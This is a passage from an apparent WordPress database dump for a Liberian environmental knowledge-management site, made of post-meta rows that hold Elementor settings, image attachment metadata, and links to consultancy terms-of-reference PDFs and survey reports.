(EKMS).<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(34500,4995,'_elementor_pro_version','3.3.6'),(34501,68,'_elementor_controls_usage','a:5:{s:7:\"heading\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:4;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:2:{s:11:\"title_color\";i:4;s:21:\"typography_typography\";i:2;}}}}s:7:\"divider\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:21:\"section_divider_style\";a:2:{s:5:\"color\";i:1;s:3:\"gap\";i:1;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:4;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:1:{s:10:\"text_color\";i:4;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:2;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:2:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:1;}}}}}'),(34503,4996,'_edit_lock','1663085256:42'),(34504,4996,'_last_editor_used_jetpack','block-editor'),(34505,4997,'_wp_attached_file','2022/09/ncsa.jpg'),(34506,4997,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:16:\"2022/09/ncsa.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"ncsa-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"ncsa-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"ncsa-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:16:\"ncsa-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:15:\"ncsa-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:16:\"ncsa-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:16:\"ncsa-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:16:\"ncsa-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:16:\"ncsa-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:16:\"ncsa-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:16:\"ncsa-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(34509,4996,'_wp_old_date','2022-09-07'),(34510,4996,'_thumbnail_id','4997'),(34511,4996,'_edit_last','42'),(34512,4996,'kava_extra_enable_breadcrumbs','inherit'),(34513,4996,'post_formats',''),(34514,4996,'gallery_tab',''),(34515,4996,'kava_extra_gallery_images',''),(34516,4996,'link_tab',''),(34517,4996,'kava_extra_link',''),(34518,4996,'kava_extra_link_target','_blank'),(34519,4996,'quote_tab',''),(34520,4996,'kava_extra_quote_text',''),(34521,4996,'kava_extra_quote_cite',''),(34522,4996,'audio_tab',''),(34523,4996,'kava_extra_audio',''),(34524,4996,'kava_extra_audio_loop','false'),(34525,4996,'kava_extra_audio_autoplay','false'),(34526,4996,'kava_extra_audio_preload','false'),(34527,4996,'video_tab',''),(34528,4996,'kava_extra_video_type','library'),(34529,4996,'kava_extra_video_library',''),(34530,4996,'kava_extra_video_external',''),(34531,4996,'kava_extra_video_poster',''),(34532,4996,'kava_extra_video_width','770'),(34533,4996,'kava_extra_video_height','480'),(34534,4996,'kava_extra_video_loop','false'),(34535,4996,'kava_extra_video_autoplay','false'),(34536,4996,'kava_extra_video_preload','false'),(34537,5000,'_last_editor_used_jetpack','classic-editor'),(34538,5000,'_edit_lock','1662998212:42'),(34539,5000,'_edit_last','42'),(34540,5001,'_last_editor_used_jetpack','classic-editor'),(34541,5001,'_edit_lock','1663062336:42'),(34542,5001,'_edit_last','42'),(34543,5002,'_wp_attached_file','2022/09/ToR_PIP-development.pdf'),(34544,5001,'_wp_page_template','default'),(34545,5001,'_wp_old_date','2022-09-12'),(34546,5001,'closed_date','2022-08-15'),(34547,5001,'owner','EPA'),(34548,5001,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2022/09/ToR_PIP-development.pdf'),(34549,5005,'_last_editor_used_jetpack','classic-editor'),(34550,5005,'_edit_lock','1663062561:42'),(34551,5005,'_edit_last','42'),(34552,5006,'_wp_attached_file','2022/09/Intl-Consultant_ToR-for-developing-TORs-High-resolution-Multi-criteria-assessment.pdf'),(34553,5005,'_wp_page_template','default'),(34554,5005,'closed_date','2022-10-03'),(34555,5005,'owner','EPA'),(34556,5005,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2022/09/Intl-Consultant_ToR-for-developing-TORs-High-resolution-Multi-criteria-assessment.pdf'),(34559,5010,'_wp_attached_file','2019/11/cari-liberia.jpg'),(34560,5010,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:24:\"2019/11/cari-liberia.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"cari-liberia-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"cari-liberia-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"cari-liberia-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:24:\"cari-liberia-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:23:\"cari-liberia-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:24:\"cari-liberia-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:24:\"cari-liberia-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:24:\"cari-liberia-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:24:\"cari-liberia-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:24:\"cari-liberia-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:24:\"cari-liberia-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"9\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"DSC-HX5V\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1395479762\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"6.62\";s:3:\"iso\";s:3:\"125\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(34561,1592,'_thumbnail_id','5010'),(34562,1592,'institution_logo','2693'),(34563,5012,'_wp_attached_file','2019/11/lnbc.jpg'),(34564,5012,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:16:\"2019/11/lnbc.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"lnbc-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"lnbc-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"lnbc-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:16:\"lnbc-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:15:\"lnbc-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:16:\"lnbc-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:16:\"lnbc-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:16:\"lnbc-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:16:\"lnbc-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:16:\"lnbc-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:16:\"lnbc-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(34565,1604,'_thumbnail_id','5012'),(34566,1604,'institution_logo','3988'),(34567,5013,'_wp_attached_file','2019/11/mof.jpg'),(34568,5013,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:15:\"2019/11/mof.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"mof-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"mof-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"mof-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"mof-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:14:\"mof-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:15:\"mof-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:15:\"mof-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:15:\"mof-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:15:\"mof-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:15:\"mof-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:15:\"mof-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(34569,2704,'_thumbnail_id','5013'),(34570,2704,'institution_logo','2711'),(34571,5015,'_wp_attached_file','2020/03/yds.jpg'),(34572,5015,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:15:\"2020/03/yds.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"yds-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"yds-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"yds-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"yds-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:14:\"yds-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:15:\"yds-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:15:\"yds-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:15:\"yds-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:15:\"yds-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:15:\"yds-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:15:\"yds-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(34573,3041,'_thumbnail_id','5015'),(34574,3041,'institution_logo','3042'),(34575,5016,'_wp_attached_file','2020/02/green-stewards.png'),(34576,5016,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:26:\"2020/02/green-stewards.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"green-stewards-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"green-stewards-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"green-stewards-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:26:\"green-stewards-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:25:\"green-stewards-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:26:\"green-stewards-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:26:\"green-stewards-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:26:\"green-stewards-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:26:\"green-stewards-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:26:\"green-stewards-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:26:\"green-stewards-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(34577,3006,'_thumbnail_id','5016'),(34578,3006,'institution_logo','3010'),(34580,5018,'_wp_attached_file','2020/02/evergreen-recycling.jpg'),(34581,5018,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:31:\"2020/02/evergreen-recycling.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"evergreen-recycling-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"evergreen-recycling-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"evergreen-recycling-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:31:\"evergreen-recycling-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:30:\"evergreen-recycling-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:31:\"evergreen-recycling-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:31:\"evergreen-recycling-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:31:\"evergreen-recycling-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:31:\"evergreen-recycling-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:31:\"evergreen-recycling-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:31:\"evergreen-recycling-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(34582,3004,'_thumbnail_id','5018'),(34584,5020,'_last_editor_used_jetpack','classic-editor'),(34585,5020,'_edit_lock','1663291276:38'),(34586,5020,'_edit_last','38'),(34587,5021,'_wp_attached_file','2022/09/L.png'),(34588,5021,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:402;s:6:\"height\";i:529;s:4:\"file\";s:13:\"2022/09/L.png\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"L-228x300.png\";s:5:\"width\";i:228;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"L-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:13:\"L-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:12:\"L-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:13:\"L-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:13:\"L-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:13:\"L-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:13:\"L-402x450.png\";s:5:\"width\";i:402;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(34589,5022,'_wp_attached_file','2022/09/20220506647856LDHS1986.pdf'),(34590,5020,'_wp_page_template','default'),(34591,5020,'download_link','https://ekmsliberia.info/wp-content/uploads/2022/09/20220506647856LDHS1986.pdf'),(34592,5020,'by','Dorothy Chieh-Johnson,Anne R. Cross, Ann A. Way, Jeremiah M. Sullivan'),(34593,5020,'year','February 1988'),(34594,5020,'_pods_document_cover_image','a:1:{i:0;i:5021;}'),(34595,5020,'document_cover_image','5021'),(34596,5020,'_pods_attached_document','a:1:{i:0;i:5022;}'),(34597,5020,'attached_document','5022'),(34598,5024,'_last_editor_used_jetpack','classic-editor'),(34599,5024,'_edit_lock','1663291910:38'),(34600,5024,'_edit_last','38'),(34601,5025,'_wp_attached_file','2022/09/202205066752167ldhs2007.pdf'),(34602,5026,'_wp_attached_file','2022/09/l2.png'),(34603,5026,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:412;s:6:\"height\";i:537;s:4:\"file\";s:14:\"2022/09/l2.png\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"l2-230x300.png\";s:5:\"width\";i:230;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"l2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:14:\"l2-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:13:\"l2-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:14:\"l2